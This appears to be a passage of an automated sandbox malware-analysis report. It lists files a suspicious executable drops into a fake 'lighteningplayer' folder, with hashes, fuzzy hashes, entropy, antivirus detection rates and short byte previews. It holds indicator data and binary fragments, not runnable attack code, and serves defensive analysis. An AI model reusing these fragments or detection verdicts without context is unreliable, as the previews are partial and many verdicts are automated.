                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`S=@.=n@.=n@.=n%g>oW.=n%g8o..=n%g9oX.=n.i>oX.=n.h8ob.=n.i8o..=n.i9od.=n%g<o[.=n@.<n..=n.h4oO.=n.h?oA.=nRich@.=n................PE..L......`..........................................@.........................................................................{...........................................................................@...............t............................text...6s.......................... ..`.rdata..............................@..@.data..............................@....vmp0....~... ...................... ....vmp1...4$.......&.................. ....reloc...............*..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\Company\NewProduct\tmp.edb
                                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x76335dd9, page size 32768, JustCreated, Windows version 0.0
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                      Entropy (8bit):0.2862983094388781
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Ao00So00J5b0yg5pzw1U7aNfv9XXXXXXXXXXXXXXX:J0yQWNf
                                                                                                                                                                                      MD5:567D8A36BF858860A49CF0BF6B384C25
                                                                                                                                                                                      SHA1:FB5EE205433E50E852805DCF1F1A5A6D7638A3D6
                                                                                                                                                                                      SHA-256:4F7276CF7BB43C99D223FC8F380317564504C35EDDC6668611DD7F06EFDE74EE
                                                                                                                                                                                      SHA-512:F028FC53764736B2554979B81EE14650ED580E1DD4F358C28C7D431B078A37237C0876FCFA393BE7096ED40B6FA8EE6FF5FA2C9A9ACF932CBCF303648F2BBFDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: v3].... .......@.......O4.7.....y.................................................................................................................................................................................................................................................................................................................. ...................................................................................................................................................................................................................................................y........y......................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\connection.dll
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):851498
                                                                                                                                                                                      Entropy (8bit):5.999129725124293
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:FIsudTRfCgj+dcpdCBEO4T1OR62/nDVygvK8F4Kq:msudTh5UUwEO4TI5DVyiK8F4Kq
                                                                                                                                                                                      MD5:3F0352C50C92AA9F8659CD9FF8F77181
                                                                                                                                                                                      SHA1:1E9283284471B8C7B27F506B1CBA3A16624AE725
                                                                                                                                                                                      SHA-256:6DAD82E52827E9BFAA91831947BA351FDDA5CA8564DCA46FA0220F35933FC22D
                                                                                                                                                                                      SHA-512:F93CC8AD89D9DE76AA51AED371F7CE8EB975CFC4AD2C7C78D71E9EE1465E43A9E1B17BFA8C6B8974B1B9BC210E4139D9B18221C0863EAEC0BD201178B0E74AD3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.]....Q......!.........p....................Pj.........................@......).....@... ......................@..n/...p..........@............................................................................s..(............................text...X...........................`.P`.data...D...........................@.0..rdata..|/.......0..................@.`@.bss.........0........................`..edata..n/...@...0..................@.0@.idata.......p.......@..............@.0..CRT....,............Z..............@.0..tls.... ............\..............@.0..rsrc...@............^..............@.0..reloc...............f..............@.0B/4...................v..............@..B/19...../}.......~...|..............@..B/31.....gr...`...t..................@..B/45.....#............n..............@..B/57.....<X.......Z..................@.0B/70......B.......D...x..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):587776
                                                                                                                                                                                      Entropy (8bit):6.439962628647099
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
                                                                                                                                                                                      MD5:42BADC1D2F03A8B1E4875740D3D49336
                                                                                                                                                                                      SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
                                                                                                                                                                                      SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
                                                                                                                                                                                      SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Hierarchical Data Format (version 5) data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):92388
                                                                                                                                                                                      Entropy (8bit):5.836011280390705
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:8CQBvT4/rH2BZ+erbMgoMinMG3LWZD/tbb2XNwC3JpSbDz9WGuT614cy:8CQB7+HOkerbeM8KZpSfzYhu0a
                                                                                                                                                                                      MD5:769E358ABE26E0565B44F860213B9BC1
                                                                                                                                                                                      SHA1:A22B5AEFD62A59F7FFDE3AAFDD94B4EF14D7CAEC
                                                                                                                                                                                      SHA-256:05CA927052CF83663B29546B06998B03EA7FBCD288F7C99E7AF8B215AC77EC4E
                                                                                                                                                                                      SHA-512:416CDDDE3CB0B0DC4C3140834A8D8E09DCE1AF0D6B6DBFF58B4CCFBBF0468724D0C1A6F9FFB13461AF795146CA6280BED3A7AFC102449C853FE287E0951E54A8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .HDF.........................h......0...........OHDR.....".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]V..FRHP............................................................................................................................(...j2............BTHD..........d(G..................1.BTHD..........d(G.....................FSHD....................................P.x.(.........G.......%.......%.......S.u.BTLF........%..........G....(........r.."...."......22|.......'.......vS$...............&................&......)......bl.+......4.......q......../......a6.6..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\libssp-0.dll
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31763
                                                                                                                                                                                      Entropy (8bit):6.036627357183098
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:tI0Cfegmp9qdYjxcXT1/OhILLSQ5YrPSpAWVmsANKyU4LZpwecObw9q5z5l84N9z:tbCmgfwxcRKQ5YrqssPUZpSvw24A9C
                                                                                                                                                                                      MD5:699698E37059AB4677549592DB2BF6C3
                                                                                                                                                                                      SHA1:975BD1E10413369941FFBD3D053A530CE31CB333
                                                                                                                                                                                      SHA-256:6315EAE539E153B3F722E92C7DE7415813E51986E9D17E7013BB8128F9FACE3A
                                                                                                                                                                                      SHA-512:68F6ADC02003C6491F2B7AAD7B1F66687E38AB352AAA1D9825CC5391C21B88E65AEDFD2EE8E046F19447A6F363B2906E51B4939EA06D2B97785B67FF5CC8801A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$=I=.|.........#.....^...x...............p.....h................................A......... ......................................................................................................................................................text....].......^..................`.P`.data... ....p.......b..............@.0..rdata...............d..............@.`@.bss..................................@..edata...............j..............@.0@.idata...............l..............@.0..CRT.................r..............@.0..tls.... ............t..............@.0..reloc...............v..............@.0B/4...................z..............@.0@................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\libvlc.dll
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):851498
                                                                                                                                                                                      Entropy (8bit):5.999129725124293
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:FIsudTRfCgj+dcpdCBEO4T1OR62/nDVygvK8F4Kq:msudTh5UUwEO4TI5DVyiK8F4Kq
                                                                                                                                                                                      MD5:3F0352C50C92AA9F8659CD9FF8F77181
                                                                                                                                                                                      SHA1:1E9283284471B8C7B27F506B1CBA3A16624AE725
                                                                                                                                                                                      SHA-256:6DAD82E52827E9BFAA91831947BA351FDDA5CA8564DCA46FA0220F35933FC22D
                                                                                                                                                                                      SHA-512:F93CC8AD89D9DE76AA51AED371F7CE8EB975CFC4AD2C7C78D71E9EE1465E43A9E1B17BFA8C6B8974B1B9BC210E4139D9B18221C0863EAEC0BD201178B0E74AD3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.]....Q......!.........p....................Pj.........................@......).....@... ......................@..n/...p..........@............................................................................s..(............................text...X...........................`.P`.data...D...........................@.0..rdata..|/.......0..................@.`@.bss.........0........................`..edata..n/...@...0..................@.0@.idata.......p.......@..............@.0..CRT....,............Z..............@.0..tls.... ............\..............@.0..rsrc...@............^..............@.0..reloc...............f..............@.0B/4...................v..............@..B/19...../}.......~...|..............@..B/31.....gr...`...t..................@..B/45.....#............n..............@..B/57.....<X.......Z..................@.0B/70......B.......D...x..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\libvlccore.dll
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9859938
                                                                                                                                                                                      Entropy (8bit):6.424131964777554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:98304:CNEA9tFqRKJ78rhWYH0Nm6rBlBAUZLX0BpyQCWiJAU1h+TKeIkiLAYtwDPY1Jcxe:CNEA9tFqRKJ78rN0NmmlVr7HGiLCY1ac
                                                                                                                                                                                      MD5:CB68F6C3FEEC4AF4E8221FE827FD27FB
                                                                                                                                                                                      SHA1:CC8221E8F52270421597B55AFF37532140EB7C89
                                                                                                                                                                                      SHA-256:7A4FC1DB558366153CE01674D585D34E2BC8FC9360684D71DA5BE6AB355FDF5A
                                                                                                                                                                                      SHA-512:F018DC9B5C0B27A67B53F162F2C6C3FAB73A139E112AEC92C7FC68B5F378F50C47DAC90A4EBC08150B6372EF5743C97CCE28914376CE0A54874E48FA9C57977E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.].....O.....!.....<....(..8...........P....tj.........................P......e;....@... .......................'.xU... (..!...p(.@.....................(.<............................`(......................%(..............................text...\:.......<..................`.P`.data........P.......B..............@.`..rdata..x....p.......^..............@.`@.bss....@7....'.......................`..edata..xU....'..V...l'.............@.0@.idata...!... (.."....'.............@.0..CRT....0....P(.......'.............@.0..tls.... ....`(.......'.............@.0..rsrc...@....p(.......'.............@.0..reloc..<.....(.......'.............@.0B/4.......-...@).......(.............@.@B/19.......;..p)...;...(.............@..B/31.....c0...`e..2....d.............@..B/45......?....i..@....h.............@..B/57.....<.....o......4o.............@.0B/70...........r.......r.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):254784
                                                                                                                                                                                      Entropy (8bit):5.544387213816278
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:p3ynqvwsyj9cpI/dG99XnUATXRl2IfLWA7u5Ku1oflwuk+BiewP:p3yqYsmcpL9pnUADTfLWA7ugmWu
                                                                                                                                                                                      MD5:FD3B4B41E95F42CE084461EC5A63BA7D
                                                                                                                                                                                      SHA1:D6B9498F93E624D3AF39433A12EBBDD7B7EE3D08
                                                                                                                                                                                      SHA-256:C498E9A13E5BC07EAF60971949A8E441D8885D6DDC64CC73037BC501E9E83532
                                                                                                                                                                                      SHA-512:76AB3EF089EC5A020F076B1B2A9FC66AE77F0F496B743C2F0C0E91669110601A83AC71A3DC58B01E51E0F1819008666ECE23F22B8AA65D9BC1E906D4367E8550
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.].<...............z........................@.................................jM....@... .................................$........K..............................................................................(............................text....y.......z..................`.P`.data...t............~..............@.0..rdata..............................@.`@.bss..................................`..idata..$...........................@.0..CRT....4...........................@.0..tls.... ...........................@.0..rsrc....K.......L..................@.0./4...........@......................@..B/19.....w+...P...,..................@..B/31......5.......6..................@..B/45......@.......B...P..............@..B/57.................................@.0B/70.....I....0......................@..B/81..........@......................@..B/92..................4..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):248960
                                                                                                                                                                                      Entropy (8bit):5.494907007841999
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:gikOk4pxx8cpdG99mDyyLVi+oeA7ukJwmhJ9lwuwoJYjF:zkOlxx899sDDBPA7uLmSh
                                                                                                                                                                                      MD5:50A833D4031BC5D73968BB09985C9AF1
                                                                                                                                                                                      SHA1:0CADD71AFEB846C01AA0BBE7534307A06FC924DB
                                                                                                                                                                                      SHA-256:DB871A0F3C13504B0DD296A91BD03132A031ED12C8449C3F2CDDE438A8615197
                                                                                                                                                                                      SHA-512:A6B9D2B34C30BCE4752B3FEA27B7BD7A76104CE3B5F2C6EBAACB33682C05AE4F2EAEB061DDD6BEB34D2633B20CCE341F7A1A5ED9835D12B397CD0A686D413735
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.]....$............t........................@..................................r....@... .................................D........K..............................................................................l............................text....s.......t..................`.P`.data...X............x..............@.0..rdata..x............z..............@.`@.bss..................................`..idata..D...........................@.0..CRT....4...........................@.0..tls.... ...........................@.0..rsrc....K.......L..................@.0./4......@....@......................@..B/19..........P... ..................@..B/31......1...p...2..................@..B/45......<.......>...<..............@..B/57..................z..............@.0B/70.................................@..B/81.....@{... ...|..................@..B/92.....................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16958
                                                                                                                                                                                      Entropy (8bit):1.082731295825109
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:PRamDOEaRXzPuOONxER5AM/8CiLGLOuez7hP3poqsvXQ9vvHV3:P0mDOEahzPuOONxER57/wa3WhwXQtV3
                                                                                                                                                                                      MD5:D063C3E8CECE712E80485902388D3C0C
                                                                                                                                                                                      SHA1:54E12FC6F1243AC4C132ED49E4801BB6EB39A06F
                                                                                                                                                                                      SHA-256:0ECD14DF82076BA66C5277B91D58DE4FA2417DDFE36A0673670BE0D8FB999FD0
                                                                                                                                                                                      SHA-512:E1DC4B28513D3366C8143DD6B0186248967B909BDF8779F67D86CE32626C3C04AF2BCB03014273A9EEAE481EE361BE3BD5D540CF2CE46CEF3429071EE3B67FB2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ......@@.... .(B......(...@......... ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):75534
                                                                                                                                                                                      Entropy (8bit):4.998886409993974
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:+TaAy7SeKnMCqwwaIVvVx1wmhHCH2PQkkkkk7d:szLeKnMCnkvVEmtbd
                                                                                                                                                                                      MD5:F8979EB0AA8A72FDF2E8F3A32017BD73
                                                                                                                                                                                      SHA1:6CA87524946C3A9C4C2A8DCE0451786DB7BEB8F4
                                                                                                                                                                                      SHA-256:D0BCE6A2BA2C2C01CC2294A5AC50C92AEAF0FD8689740F8810613B7B5F6CE442
                                                                                                                                                                                      SHA-512:A0879C175090E5AAED152C9C41B6E92942FCDE8F900BC2445103432AD0CDCD0B1ABE94B0E8F239B63D2E18D0D0F21D22B50D8B0F8EC98E84EE81BAE645D5BD65
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......D...@../../extras/package/win32/../../../share/lua/extensions/VLSub.lua............6+........@@...@..@A...A..@B.J...I..I@C.I.C.I@D.I.D.I@E.I.E.I@F.I.F.I@G.I.G.I@H.I.H.I@I.I.I..@..J...I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I...I...I...I...I...I...I...I...I...I...I...I...I...I...I...I....(...(.....I...@)...).....I...I....@..J........@*...*..@........*.A.+..@......AA+...+."A..J...........bA........+...,..A.......B,.A.,..A......A.,...-."B..J....B-...-.bB........-......B.......C..A....B......A...../."C..J....C/.../.bC...........D...C..........A....C......A...../."D..J....D......bD........0..E0..D........0.A.0..D......A.1..E1."E..J.........1.bE........1...2..E.......F2.A.2..E......A.2...3."F..J........F..bF.......F3...3..F........3.A.4..F......A......."G..J....G4...4.bG........4...5..G.......H5.A.5..G......A.5...6."H..J....H6...6.bH........6.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3817
                                                                                                                                                                                      Entropy (8bit):5.091276264043097
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FiwrDEKaCCGPY+B5RfDLDkQVLEygqeNnG0Ln0yoESZCoyiAjuHH1/8Hs5SU:FjtaC/RrfDLDJVoyiNrLDoPJwskU
                                                                                                                                                                                      MD5:D22172DD6172684093F09DD792E7895E
                                                                                                                                                                                      SHA1:6A71F72C19E862EAC6F98883290A9588E020F087
                                                                                                                                                                                      SHA-256:F9A95D835F65815715E8366B16E6A780D635307BB5DC67AC54EBD74732E49363
                                                                                                                                                                                      SHA-512:555A7C47DBD571FABDEDE9A5E135627D2625D418648462F27BD4707AA5A83A1DBEB6729FD851C258183E6C4AE9A75634A2C15129FF24AB5EC97B5EE1412318D0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: root { .. display: block;..}..body{..}..#mainContainer{...text-align: center;...width: 800px;..}..#controlContainer{...width: 800px;..}..#libraryContainer{...width: 800px;...margin-top: 2px;..}..#libraryTree{...height: 300px;...overflow: auto;...white-space: nowrap;...text-align: left;..}..#viewContainer{...width: 800px;..}..#mediaViewer{...min-height: 500px;...background-color:#222;..}..#player{...top:0px;...height: 500px;...width: 500px;...background-color:#222;..}..#seekSlider{...width: 98%;...margin-left:5px;..}..#volumeSlider{...width: 100px;...display: inline-block;..}..#currentVolume{...display: inline-block;..}..#mediaTitle{...position: absolute;...top: 0px;...left: 10px;...width: 600px;...text-align: center;...padding: 5px;...overflow: auto;..}..#currentTime{...margin-top:-40px;...float: left;...text-align: left;..}....#totalTime{...margin-top:-40px;...float: right;...text-align: right;..}....#controlTable{...position:relative;...height: 150px;..}..#controlButtons{...positi
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2850
                                                                                                                                                                                      Entropy (8bit):5.147113070909875
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:F/JotS50w8LUB3I0YBCG/AW+whOif5p/6Zo93EyiAj4HHH1/8udqJB15ouiHgt:F/JoI50PEY0sT/AHwgiBwo93EyiAjuHs
                                                                                                                                                                                      MD5:C32EA1F5680C3FAA5B10A037C0471543
                                                                                                                                                                                      SHA1:ABC162B4435F972BA57382CF066622848E7B02DE
                                                                                                                                                                                      SHA-256:F5FCECF622743134645E16015C3E8B03E83A2EB4DD00C4CD6D5DC287A016C1E8
                                                                                                                                                                                      SHA-512:2EC6BD9AA285E3FD5587BBCE60226675B661E25346F79FB3C7803F0F9ADA40301033AA312AA3E35225F8B519CB3FA1FF386B596E32223B484378CE2B2E7DD0B6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: root { .. display: block;..}..#content{....}..body{...font: 11pt Helvetica, Arial, sans-serif;...background-color:#EEE;...margin: 0px;..}....#libraryTree{...height: 300px;...overflow:scroll;...white-space: nowrap;...text-align: left;..}....#mediaViewer{...min-height: 500px;..}..#meta {...position:relative;...width:100%;..}..#seekSlider{...width: 100%;..}....#volumeSlider{...width: 100%;...display: inline-block;..}..#currentVolume{...display: inline-block;..}..#mediaTitle{...text-align:center;...width:100%;...margin-top:5px;..}..#currentTime{...float: left;...text-align: left;..}..#totalTime{...float: right;...text-align: right;..}..#play_controls, #controls{...margin-top:30px;...width:95%;...margin-left:auto;...margin-right:auto;..}....#controlTable{...position:relative;...height: 150px;..}....#buttonszone li{...float: left;..}....#art{...top:0px;...width:150px;...height:150px;...margin:0 auto;...box-sizing:border-box;...-webkit-box-sizing:border-box;..}.....ui-slider-range{...backg
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):201
                                                                                                                                                                                      Entropy (8bit):6.382857878349319
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVXtamP0qJVo415T5qjYaOwyHBS9ftZgB5roo2mSs+vfB1p:6v/lhPnPbVo41+jYakhgtq5rpKfjp
                                                                                                                                                                                      MD5:139B9F8B50309295D4632C927F2060D3
                                                                                                                                                                                      SHA1:182E0E40EA9CE075D70DAC695CE89B2F8C215A11
                                                                                                                                                                                      SHA-256:ADB182BF32D80030963BFAE7079295B8C35085A85CF5A0FE28046DB1B4836E7F
                                                                                                                                                                                      SHA-512:6B911D31C467D2A5BF3B82D57403786CDCD1737DAAB148DEDDA65885EE88A6BB5E9CBE98F06DB415AD0F68F5A3DF569135A76DC39D457F02192CDEFB05A4719E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...(...(........m....IDATX...;.. .E...&\..[.HA.|.X.-^1....W....W.N.^o..'2...p....@*...)`$.>/2n.$.@...$.* .W.............8"..Zd..H...M.&q..I.$n.7...M.&q..I..../...'I......IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):197
                                                                                                                                                                                      Entropy (8bit):6.443060947472863
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVXtZbKpgK22jyHY38jnQHlB552S5kLgrZMFo3P1pOIa+UQ+4NWIHn:6v/lhPvbyqHYMLQHlP52KCgreGNcx4dp
                                                                                                                                                                                      MD5:387DC16210273E62FFAE06972E45CBAC
                                                                                                                                                                                      SHA1:74A7E1BF795A281541C6B2CEAF77060681E64D5D
                                                                                                                                                                                      SHA-256:C6133633C005B1C344F4AE682811157A366AF0F9F637EE4FB65E896FFBF0D71E
                                                                                                                                                                                      SHA-512:D9BA6BFAF86838A8EB4E0D598B18AED18D215470E97A3DAE8BA22A4485C18A5B57DD8FC046A2DB63D36E1C066FDCFD941688892A1D6F11D9FFB95B254063C8E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...(...(........m....IDATX...9.. ..Q..7..........S...........3.7.?.....i..H.U .W.d..0...72n.$.@.n.$.: ...........;.fm.#....%...15..DM.&Q..I.$j.5..DM.&I\.7.KM..2.,....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 40 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                                      Entropy (8bit):3.900126810970078
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlVbtr/okx2lVbaRbErFXAsnQ/ljp:6v/lhPWkUv+R3GQ/Vp
                                                                                                                                                                                      MD5:EBFE0256941F757936125A104DD0E47F
                                                                                                                                                                                      SHA1:F568D061917EB74853C955DD2DC87E098A1A49F2
                                                                                                                                                                                      SHA-256:61B9E46D291ED3D7800CBC899B7EDCB95327D16CD61085BB515381AF32BC1469
                                                                                                                                                                                      SHA-512:0205E91039AD8A244EB7A3B252524C4F5102202F1DE2DF70F7D5DEDA5677F80946025E57CDC044C651D517D3488E130581811A97B8275F9F2359ED725E771A89
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...(...d......drz...ZIDATh.............a..;Us.................................................................~..B..BU....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 1 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                      Entropy (8bit):5.361402854695405
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:yionv//thPlE8SWlLIIcWZDcREDXviwtff9Kltjp:6v/lhPhSWlkACRsvig39KTp
                                                                                                                                                                                      MD5:9D668FB893225B8AEB91FE21D2BBEE9A
                                                                                                                                                                                      SHA1:0E2D4E277CCABA84F60F1F9D6C5AA27BF4F5386A
                                                                                                                                                                                      SHA-256:49D57607054D07581044A39025EA0FF623185D5E8117B7325084DB098795298D
